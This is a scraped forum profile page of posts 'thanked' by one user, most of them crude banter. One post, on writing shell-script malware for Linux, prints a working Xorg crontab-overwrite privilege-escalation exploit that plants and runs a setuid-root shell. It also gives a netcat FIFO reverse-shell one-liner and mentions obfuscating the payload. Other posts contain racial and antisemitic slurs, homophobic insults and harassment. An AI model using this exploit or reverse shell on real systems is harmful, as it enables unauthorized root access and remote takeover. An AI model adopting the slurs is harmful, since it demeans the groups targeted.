User Controls
Posts That Were Thanked by Bueno
-
2021-07-25 at 9:57 AM UTC in Fona's Apartment SearchFona what r u getting for cleaning that shithole?
And god damn even strung out on heroin I wasn’t that fucking disgusting, some people man
Btw: fuxking delete Facebook and messenger and any other social media man, talking about having no time and shit, social media eats your day without you even knowing, I deleted all that shit 3 years ago and have been substantially happier ever since, something about that shit is just depressing by as fuckThe following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-24 at 7:24 AM UTC in Sh/Bash based malware for *Nix.Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
##!!##_1
Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
I figured it should be good since stuff like this works also:
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
Thicc threads niggas. One on low level security and dev incoming soon as well.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-16 at 8:04 AM UTC in Gaming is dead
Originally posted by Quick Mix Ready I think the best thing for your Mom is to meet a guy who sweeps her off her feet, takes one fucking look at you and says "Yeah, You need to go, My Man. You are a man aren't you? Get a haircut and give this guy a call" and then hands you a business card of a recruiting office for the US Army or Navy or some shit.
"get a job"
"I already have a job!"
"get a job that exposes you to enemy gunfire"The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-16 at 5:57 AM UTC in Gaming is deadHe's so boring. he never finishes what he starts. he talks real slowwwww and it is if he's trying to think of what to say as he's saying nothing.
Hiki, you're going to be real bummed out when your Mom dies from depression.
I think the best thing for your Mom is to meet a guy who sweeps her off her feet, takes one fucking look at you and says "Yeah, You need to go, My Man. You are a man aren't you? Get a haircut and give this guy a call" and then hands you a business card of a recruiting office for the US Army or Navy or some shit.
Maybe your j'ewish gay friends will take you in or who knows, Maybe Waria will have his mom buy you a one way ticket to Poland to hook up with him and you guys can be Partna' In Crime you little queefcakeThe following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-16 at 4:05 AM UTC in Gaming is deadthe only person who clicks your vocaroo links is wario, and he does it to jerk off thinking about prison twinksThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-13 at 10:15 AM UTC in Would you be opposed to having a Tor Mirror?
Originally posted by D4NG0 u still jumped to calling me a fed tho and that hurt my feelings (u_u")
i don't call you chester the molester
In light of this information, after long consideration and reflection i have come to the conclusion that i have wronged you in a manner unbecoming of my character, morals, and ideals. Therefore i would solemnly beg your pardon, and ask you to grant me the chance to prove that i am indeed not the person that my words, said with such callousness and cruelty, describe who i proclaim or aspire to be. I am sorry. And i hope that The Almighty will be merciful on me for this affront towards His servant.
Thank you. -
2021-07-12 at 12:45 PM UTC in Would you be opposed to having a Tor Mirror?
Originally posted by Bueno Would hate to see yall do all this work if no one is really going to use it.
Are there folks who would use this?
Regarding syncing the database, PMs are still cleartext.
Just so happen that I was about to work on this the other day, but ran into some issues, I got too annoyed to figure out.
Sent lammard a PM, maybe he knows.
It was a fresh local deploy, error on login, "here is no current event loop in thread 'Thread-1'."
Havent seen this before, dono if something bad got pushed or if somehow I fucked it.
If we're gonna go ahead with this, we'll brainstorm the technical aspects and debug the stuff that needs debugging collaboratively.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-10 at 10:18 AM UTC in I am not very impressed here anymore.Once ur not riding high in the saddle off the intoxicating aroma of 42 year old stripper pussy, youll come crowling back make my wordsThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-10 at 6:44 AM UTC in When you google yourself does anything positive come up?The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-03 at 3:27 AM UTC in Random image thread
The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-02 at 12 PM UTC in People who use imgbb autodeleteIf I see anyone using imgbb I am gonna report the picture and say OMG FUHYDS IM A RELMWPOMRMSDWP@K@PMD and it will promptly be removed.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-02 at 3:29 AM UTC in Sorry guys, I killed Fona.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-01 at 7:55 AM UTC in Random image thread
-
2021-06-28 at 9:42 PM UTC in Windows 11Everything is standardised on win7/10 now so it's gonna be shit for a few years at least after this, win 7 was better than 8 and 10 and from the looks of it 10 is better than 11.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-06-27 at 9:30 PM UTC in An Apparently To Alert You Of A Sim-Swap Attackthere would be entirely too much vibrating and sound effects from the message notifications, i dont see how this racket could be overlooked.
User was banned for saying the taboo phrase "tire"! -
2021-06-26 at 1:49 AM UTC in Discrete body worn recording equipment?chell reads ur posts dude.
-
2021-06-22 at 6:23 AM UTC in Random image thread
The following users say it would be alright if the author of this post didn't die in a fire! -
2021-06-21 at 9:33 AM UTC in What kind of Space Ship would niggasin be?get in, loser
The following users say it would be alright if the author of this post didn't die in a fire! -
2021-06-19 at 11:15 PM UTC in French General Implies the J'ewqui?
QUI?!?The following users say it would be alright if the author of this post didn't die in a fire! -
2021-06-19 at 12:01 PM UTC in French General Implies the J'ew
turn subtitles on. video will inevitably be removed; I downloaded it but wasn't able to get the subtitles.
alt link (shittier): https://files.catbox.moe/67wguk.webm
he doesn't even say it, when asked for like the tenth time he says 'well, you know that community well'
the frizzy little weasel looks like his head's about to pop
The following users say it would be alright if the author of this post didn't die in a fire!
